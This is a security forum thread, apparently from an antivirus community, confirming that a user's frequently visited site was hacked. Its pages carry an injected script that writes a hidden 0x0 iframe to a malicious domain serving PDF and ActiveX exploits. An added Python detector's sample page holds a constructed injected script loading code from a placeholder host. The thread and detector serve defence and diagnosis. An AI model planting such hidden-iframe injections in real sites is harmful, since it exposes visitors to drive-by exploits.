Hello, every day I go to a page, and today avast! says that it found a trojan???
This is the page:
hxxp://www.sagastume.com/
This is the detection found:
JS:ScriptIP-inf
I think that it is a false positive because it only detects something in that page after today's update.
If you need more information, just ask me.
Thanks for the help
Wepawet (alpha) - malicious
hxxp://wepawet.iseclab.org/view.php?hash=0f7dfbc7ee0ae445974788926dfb9ce7&t=1272751433&type=js
Hi Pondus,
There are some 75 variants of this malcode around
That wepawet link is giving an alert for JS-pdfka BT trojan threat aliases for Exploit.PDF-JS.Gen (v):
Alias (Detected by)
Bloodhound.Exploit.196 (Symantec)
Exploit:Win32/Pidief.E (Microsoft)
VirTool:JS/Imbarligalgo.gen!A (Microsoft)
Virus.JS.Pdfka (Ikarus)
JS:Pdfka-BK (Avast)
Virus.JS.Pdfka!IK (a-squared)
JS:Pdfka-AG (Avast)
JS.Obfus-5 (ClamAV)
Troj/PDFJs-P (Sophos)
Exploit.PDF-JS.Gen (GData)
Troj/PDFJs-AH (Sophos)
Exploit.PDF-JS.Gen.C03 (nProtect)
Description here: http://www.bitdefender.com/VIRUS-1000487-en--Exploit.PDF-JS.Gen.html
Removal instructions: http://www.hkactivity.com/how-to-delete-exploit-pdf-js-gen/
Pondus, please, make the link non-clickable with hxtp or wXw
polonus
So, this is not a False Positive?
The Site was hacked?
My PC isn’t infected, right?
Thanks for the help
The Script tag outside of the closing HTML tag is against standards and as such highly suspect.
See image; the script document.write line has been broken to make it easier to see.
This script creates a 0x0 iframe tag which points to a malicious site (grepad.com) and it is this script tag and associated attempt to connect to a malicious site that causes the alert, see image2.
No it isn’t an FP.
It looks like the site was hacked.
Your system shouldn’t be infected as avast blocked it.
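Added example, not part of the original post or the thread: a Python check for the two page-level signs described in the post above, a script tag placed after the closing HTML tag and a document.write call that emits a 0x0 iframe. The sample page, the finding names and the host example.invalid are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page; example.invalid is a placeholder, not a real indicator.
SAMPLE = """<html><body><p>Welcome</p><iframe src="/map.html" width="400" height="300"></iframe>
</body></html>
<script>document.write('<ifr' + 'ame src="http://example.invalid/in.php" width=0 height=0></ifr' + 'ame>');</script>
"""

JOIN = re.compile(r"""['"]\s*\+\s*['"]""")   # rejoins 'ifr' + 'ame' string splits
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
WRITE = re.compile(r"document\s*\.\s*write", re.I)
DIM = r"\b%s\s*=\s*[\"']?[01](?:px)?\b"      # width/height of 0 or 1 pixel

def zero_sized(tag_text):
    return all(re.search(DIM % d, tag_text, re.I) for d in ("width", "height"))

class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.html_closed, self.in_script = False, False
        self.buf, self.findings = [], []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script, self.buf = True, []
            if self.html_closed:              # markup after </html>
                self.findings.append("script-after-html-close")
        elif tag == "iframe" and zero_sized(self.get_starttag_text()):
            self.findings.append("hidden-iframe")

    def handle_data(self, data):
        if self.in_script:                    # script text can arrive in chunks
            self.buf.append(data)

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True
        elif tag == "script" and self.in_script:
            self.in_script = False
            body = JOIN.sub("", "".join(self.buf))
            if WRITE.search(body) and any(zero_sized(m.group()) for m in IFRAME.finditer(body)):
                self.findings.append("script-writes-hidden-iframe")

def scan(html):
    s = Scanner()
    s.feed(html)
    s.close()
    return s.findings
```

Calling `scan(SAMPLE)` reports both signs for the constructed page, while the visible 400x300 iframe inside the body is not flagged.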
Hi Light Archangel,
As you were alerted by the avast shield and it disconnected from the site, you are not infected.
Malicious software includes 7 exploit(s), 4 trojan(s) on the redirect site…
To be fully protected against all malcode that could enter a browser, use a browser like Firefox with the NoScript extension and RequestPolicy extension installed to have all these issues blocked, and allow only what you need when you visit a site.
polonus
This script creates a 0x0 iframe tag which points to a malicious site (grepad.com) and it is this script tag and associated attempt to connect to a malicious site that causes the alert, see image2.
And that site has this result:
Wepawet (alpha) - malicious
hxxp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js
I’m using Firefox (it is my default browser).
I have the WOT + NoScript addons.
I allowed the scripts of that page because I went there every day.
This did not happen yesterday…
For that reason I thought that it was a false positive.
avast protected my computer very well then!! ;D
My PC is fine, I have had no virus since I installed avast!
Now I’ll be looking for a similar site to sagastume.com
I’ll try to warn all my friends that used that site too…
Thanks to all for your replies.
So long my friends
Hi DavidR,
What malware do we detect for the grepad.com link hxtp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js
I did not pass the above link directly, because avast would flag it…
Adobe util.printf overflow
Adobe getIcon
Office OCX OpenWebFile
AppStream LaunchObj
Hummingbird PerformUpdateAsync
Peachtree ExecutePreferredApplication
C6 propDownloadUrl
polonus
Yes, I tend not to get too carried away going to the next level down, etc., once it is reasonably clear that the site has been hacked/infected, etc., and the avast detection was good.
Again, I try to stick with what is actually on the site (where the detection was made) if that can determine the detection is good; life is too short for detailed delving, once confirmed I stop.